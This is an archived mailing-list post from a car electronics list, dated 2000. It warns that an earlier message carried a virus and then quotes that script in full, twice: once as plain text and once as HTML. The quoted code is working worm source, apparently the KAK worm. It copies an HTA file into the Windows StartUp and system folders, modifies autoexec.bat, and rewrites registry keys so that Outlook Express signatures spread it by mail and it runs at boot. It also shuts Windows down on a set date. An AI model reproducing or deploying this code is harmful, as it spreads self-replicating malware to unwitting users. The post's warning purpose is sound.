Porsche 1984 944 Motronic DME ..... Binaries? <<< VIRUS!!!
Axel Rietschin
Axel_Rietschin at compuserve.com
Sun Oct 8 22:16:44 GMT 2000
This is a multi-part message in MIME format.
------=_NextPart_000_0396_01C03186.0A215830
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
The message posted by Ivan contains the following script:
<SCRIPT><!--
function=3D20sErr(){return=3D20true;}window.onerror=3D3DsErr;scr.Reset();=
scr.doc=3D3D=3D
"Z<HTML><HEAD><TITLE>Driver=3D20Memory=3D20Error</"+"TITLE><HTA:APPLICATI=
ON=3D20I=3D
D=3D3D\"hO\"=3D20WINDOWSTATE=3D3DMinimize></"+"HEAD><BODY=3D20BGCOLOR=3D3=
D#CCCCCC><ob=3D
ject=3D20id=3D3D'wsh'=3D20classid=3D3D'clsid:F935DC22-1CF0-11D0-ADB9-00C0=
4FD58A0B'>=3D
</"+"object><SCRIPT>function=3D20sEr(){self.close();return=3D20true;}wind=
ow.one=3D
rror=3D3DsEr;fs=3D3Dnew=3D20ActiveXObject('Scripting.FileSystemObject');w=
d=3D3D'C:\=3D
\\\Windows\\\\';fl=3D3Dfs.GetFolder(wd+'Applic~1\\\\Identities');sbf=3D3D=
fl.Sub=3D
Folders;for(var=3D20mye=3D3Dnew=3D20Enumerator(sbf);!mye.atEnd();mye.move=
Next())i=3D
dd=3D3Dmye.item();ids=3D3Dnew=3D20String(idd);idn=3D3Dids.slice(31);fic=3D=
3Didn.subst=3D
ring(1,9);kfr=3D3Dwd+'MENUD=3DC9~1\\\\PROGRA~1\\\\D=3DC9MARR~1\\\\kak.hta=
';ken=3D3D=3D
wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=3D3Dwd+'System\\\\'+fi=
c+'.=3D
hta';kk=3D3D(fs.FileExists(kfr))?kfr:ken;aek=3D3D'C:\\\\AE.KAK';aeb=3D3D'=
C:\\\\Au=3D
toexec.bat';if(!fs.FileExists(aek)){re=3D3D/kak.hta/i;if(hO.commandLine.s=
earc=3D
h(re)!=3D3D-1){f1=3D3Dfs.GetFile(aeb);f1.Copy(aek);t1=3D3Df1.OpenAsTextSt=
ream(8);=3D
pth=3D3D(kk=3D3D=3D3Dkfr)?wd+'MENUD=3D90~1\\\\PROGRA~1\\\\D=3D90MARR~1\\\=
\kak.hta':ke=3D
n;t1.WriteLine('@echo=3D20off>'+pth);t1.WriteLine('del=3D20'+pth);t1.Clos=
e();}}=3D
if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=3D3D2=
;}t2=3D
=3D3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLi=
nes(=3D
2);ky=3D3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Mic=
roso=3D
ft\\\\Outlook=3D20Express\\\\5.0';sg=3D3D'\\\\signatures';t2.WriteLine(ky=
+sg+']=3D
');t2.Write('\"Default=3D20Signature\"=3D3D\"00000000\"');t2.WriteBlankLi=
nes(2)=3D
;t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=3D3D\"Signatu=
re=3D20=3D
#1\"');t2.WriteLine('\"type\"=3D3Ddword:00000002');t2.WriteLine('\"text\"=
=3D3D\=3D
"\"');t2.Write('\"file\"=3D3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wr=
iteB=3D
lankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature=3D20Flags\"=3D3Dd=
word:0=3D
0000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFT=
WA=3D
RE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\=
"=3D3D=3D
\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLin=
es=3D
(2);t2.close();wsh.Run(wd+'Regedit.exe=3D20-s=3D20'+wd+'kak.reg');t3=3D3D=
fs.Creat=3D
eTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV=3D20style=3D3D\"POSI=
TION:a=3D
bsolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT=3D20classid=3D3Dclsid:062=
90BD5-=3D
48AA-11D2-8432-006008C3FBFC=3D20id=3D3Dscr></"+"OBJECT></"+"DIV>');t4=3D3=
Dfs.Open=3D
TextFile(k2,1);while(t4.Read(1)!=3D3D'Z');t3.WriteLine('<SCRIPT><!--');t3=
.wri=3D
te('function=3D20sErr(){return=3D20true;}window.onerror=3D3DsErr;scr.Rese=
t();scr.=3D
doc=3D3D\"Z');rs=3D3Dt4.Read(3095);t4.close();rd=3D3D/\\\\/g;re=3D3D/\"/g=
;rf=3D3D/<\\=3D
//g;rt=3D3Drs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"=
+"\"=3D
+\"');t3.WriteLine(rt+'\";la=3D3D(navigator.systemLanguage)?navigator.sys=
temL=3D
anguage:navigator.language;scr.Path=3D3D(la=3D3D=3D3D\"fr\")?\"C:\\\\\\\\=
windows\=3D
\\\\\\\Menu=3D20D=3DE9marrer\\\\\\\\Programmes\\\\\\\\D=3DE9marrage\\\\\\=
\\kak.ht=3D
a\":\"C:\\\\\\\\windows\\\\\\\\Start=3D20Menu\\\\\\\\Programs\\\\\\\\Star=
tUp\=3D
\\\\\\\kak.hta\";agt=3D3Dnavigator.userAgent.toLowerCase();if(((agt.index=
Of(\=3D
"msie\")!=3D3D-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"ms=
ie=3D20=3D
5.\")!=3D3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJEC=
T></=3D
"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=
=3D3D=3D
2;fs.DeleteFile(wd+'kak.reg');d=3D3Dnew=3D20Date();if(d.getDate()=3D3D=3D=
3D1=3D20&&=3D20=3D
d.getHours()>17){alert('Kagou-Anti-Kro$oft=3D20says=3D20not=3D20today=3D2=
0!');wsh.R=3D
un(wd+'RUNDLL32.EXE=3D20user.exe,exitwindows');}self.close();</"+"SCRIPT>=
S3=3D20=3D
driver=3D20memory=3D20alloc=3D20failed=3D20 =3D20!]]%%%%%</"+"BODY><=
/"+"HTML>";l=3D
a=3D3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
age;=3D
scr.Path=3D3D(la=3D3D=3D3D"fr")?"C:\\windows\\Menu=3D20D=3DE9marrer\\Prog=
rammes\\D=3DE9=3D
marrage\\kak.hta":"C:\\windows\\Start=3D20Menu\\Programs\\StartUp\\kak.ht=
a";a=3D
gt=3D3Dnavigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D3D-1=
)&&(pa=3D
rseInt(navigator.appVersion)>4))||(agt.indexOf("msie=3D205.")!=3D3D-1))sc=
r.writ=3D
e();
//--></SCRIPT>
------=_NextPart_000_0396_01C03186.0A215830
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dwindows-1252">
<META content=3D"MSHTML 5.50.4207.2601" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>The message posted by Ivan contains the =
following=20
script:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial=20
size=3D2><SCRIPT><!--<BR>function=3D20sErr(){return=3D20true;}wi=
ndow.onerror=3D3DsErr;scr.Reset();scr.doc=3D3D=3D<BR>"Z<HTML><HE=
AD><TITLE>Driver=3D20Memory=3D20Error</"+"TITLE><HTA:AP=
PLICATION=3D20I=3D<BR>D=3D3D\"hO\"=3D20WINDOWSTATE=3D3DMinimize></"=
+"HEAD><BODY=3D20BGCOLOR=3D3D#CCCCCC><ob=3D<BR>ject=3D20id=3D=
3D'wsh'=3D20classid=3D3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>=3D=
<BR></"+"object><SCRIPT>function=3D20sEr(){self.close();retur=
n=3D20true;}window.one=3D<BR>rror=3D3DsEr;fs=3D3Dnew=3D20ActiveXObject('S=
cripting.FileSystemObject');wd=3D3D'C:\=3D<BR><A>\\\Windows\\\\';fl=3D3Df=
s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3D3Dfl.Sub</A>=3D<BR>Folders=
;for(var=3D20mye=3D3Dnew=3D20Enumerator(sbf);!mye.atEnd();mye.moveNext())=
i=3D<BR>dd=3D3Dmye.item();ids=3D3Dnew=3D20String(idd);idn=3D3Dids.slice(3=
1);fic=3D3Didn.subst=3D<BR>ring(1,9);kfr=3D3Dwd+'MENUD=3DC9~1\\\\PROGRA~1=
\\\\D=3DC9MARR~1\\\\kak.hta';ken=3D3D=3D<BR>wd+'STARTM~1\\\\Programs\\\\S=
tartUp\\\\kak.hta';k2=3D3Dwd+'System\\\\'+fic+'.=3D<BR>hta';kk=3D3D(fs.Fi=
leExists(kfr))?kfr:ken;aek=3D3D'C:\\\\AE.KAK';aeb=3D3D'C:\\\\Au=3D<BR>toe=
xec.bat';if(!fs.FileExists(aek)){re=3D3D/kak.hta/i;if(hO.commandLine.sear=
c=3D<BR>h(re)!=3D3D-1){f1=3D3Dfs.GetFile(aeb);f1.Copy(aek);t1=3D3Df1.Open=
AsTextStream(8);=3D<BR>pth=3D3D(kk=3D3D=3D3Dkfr)?wd+'MENUD=3D90~1\\\\PROG=
RA~1\\\\D=3D90MARR~1\\\\kak.hta':ke=3D<BR>n;t1.WriteLine(<A=20
href=3D"mailto:'@echo=3D20off>'+pth);t1.WriteLine('del=3D20'+pth);t1.Clos=
e">'@echo=3D20off>'+pth);t1.WriteLine('del=3D20'+pth);t1.Close</A>();}=
}=3D<BR>if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attribut=
es=3D3D2;}t2=3D<BR>=3D3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT=
4');t2.WriteBlankLines(=3D<BR>2);ky=3D3D'[HKEY_CURRENT_USER\\\\Identities=
\\\\'+idn+'\\\\Software\\\\Microso=3D<BR>ft\\\\Outlook=3D20Express\\\\5.0=
';sg=3D3D'\\\\signatures';t2.WriteLine(ky+sg+']=3D<BR>');t2.Write('\"Defa=
ult=3D20Signature\"=3D3D\"00000000\"');t2.WriteBlankLines(2)=3D<BR>;t2.Wr=
iteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=3D3D\"Signature=3D2=
0=3D<BR>#1\"');t2.WriteLine('\"type\"=3D3Ddword:00000002');t2.WriteLine('=
\"text\"=3D3D\=3D<BR>"\"');t2.Write('\"file\"=3D3D\"C:\\\\\\\\WINDOWS\\\\=
\\\\kak.htm\"');t2.WriteB=3D<BR>lankLines(2);t2.WriteLine(ky+']');t2.Writ=
e('\"Signature=3D20Flags\"=3D3Ddword:0=3D<BR>0000003');t2.WriteBlankLines=
(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWA=3D<BR>RE\\\\Microsoft\\\\=
Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=3D3D=3D<BR>\"C:\\=
\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines=3D<=
BR>(2);t2.close();wsh.Run(wd+'Regedit.exe=3D20-s=3D20'+wd+'kak.reg');t3=3D=
3Dfs.Creat=3D<BR>eTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY=
><DIV=3D20style=3D3D\"POSITION:a=3D<BR>bsolute;RIGHT:0px;TOP:-20px;=
Z-INDEX:5\"><OBJECT=3D20classid=3D3Dclsid:06290BD5-=3D<BR>48AA-11D2=
-8432-006008C3FBFC=3D20id=3D3Dscr></"+"OBJECT></"+"DIV>');=
t4=3D3Dfs.Open=3D<BR>TextFile(k2,1);while(t4.Read(1)!=3D3D'Z');t3.WriteLi=
ne('<SCRIPT><!--');t3.wri=3D<BR>te('function=3D20sErr(){return=3D=
20true;}window.onerror=3D3DsErr;scr.Reset();scr.=3D<BR>doc=3D3D\"Z');rs=3D=
3Dt4.Read(3095);t4.close();rd=3D3D/\\\\/g;re=3D3D/\"/g;rf=3D3D/<\\=3D<=
BR>//g;rt=3D3Drs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'=
</"+"\"=3D<BR>+\"');t3.WriteLine(rt+'\";la=3D3D(navigator.systemLangua=
ge)?navigator.systemL=3D<BR>anguage:navigator.language;scr.Path=3D3D(la=3D=
3D=3D3D\"fr\")?\"C:\\\\\\\\windows\=3D<BR><A>\\\\\\\Menu=3D20D=3DE9marrer=
\\\\\\\\Programmes\\\\\\\\D=3DE9marrage\\\\\\\\kak.ht</A>=3D<BR>a\":\"C:\=
\\\\\\\windows\\\\\\\\Start=3D20Menu\\\\\\\\Programs\\\\\\\\StartUp\=3D<B=
R><A>\\\\\\\kak.hta\";agt=3D3Dnavigator.userAgent.toLowerCase();if(((agt.=
indexOf(\</A>=3D<BR>"msie\")!=3D3D-1)&&(parseInt(navigator.appVer=
sion)>4))||(agt.indexOf(\"msie=3D20=3D<BR>5.\")!=3D3D-1))scr.write();'=
);t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></=3D<BR=
>"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').=
Attributes=3D3D=3D<BR>2;fs.DeleteFile(wd+'kak.reg');d=3D3Dnew=3D20Date();=
if(d.getDate()=3D3D=3D3D1=3D20&&=3D20=3D<BR>d.getHours()>17){a=
lert('Kagou-Anti-Kro$oft=3D20says=3D20not=3D20today=3D20!');wsh.R=3D<BR>u=
n(wd+'RUNDLL32.EXE=3D20user.exe,exitwindows');}self.close();</"+"SCRIP=
T>S3=3D20=3D<BR>driver=3D20memory=3D20alloc=3D20failed=3D20&nbsp;=3D=
20!]]%%%%%</"+"BODY></"+"HTML>";l=3D<BR>a=3D3D(navigator.syst=
emLanguage)?navigator.systemLanguage:navigator.language;=3D<BR>scr.Path=3D=
3D(la=3D3D=3D3D"fr")?"C:\\windows\\Menu=3D20D=3DE9marrer\\Programmes\\D=3D=
E9=3D<BR>marrage\\kak.hta":"C:\\windows\\Start=3D20Menu\\Programs\\StartU=
p\\kak.hta";a=3D<BR>gt=3D3Dnavigator.userAgent.toLowerCase();if(((agt.ind=
exOf("msie")!=3D3D-1)&&(pa=3D<BR>rseInt(navigator.appVersion)>=
4))||(agt.indexOf("msie=3D205.")!=3D3D-1))scr.writ=3D<BR>e();<BR>//-->=
</SCRIPT><BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0396_01C03186.0A215830--
----------------------------------------------------------------------------
To unsubscribe from diy_efi, send "unsubscribe diy_efi" (without the quotes)
in the body of a message (not the subject) to majordomo at lists.diy-efi.org
More information about the Diy_efi
mailing list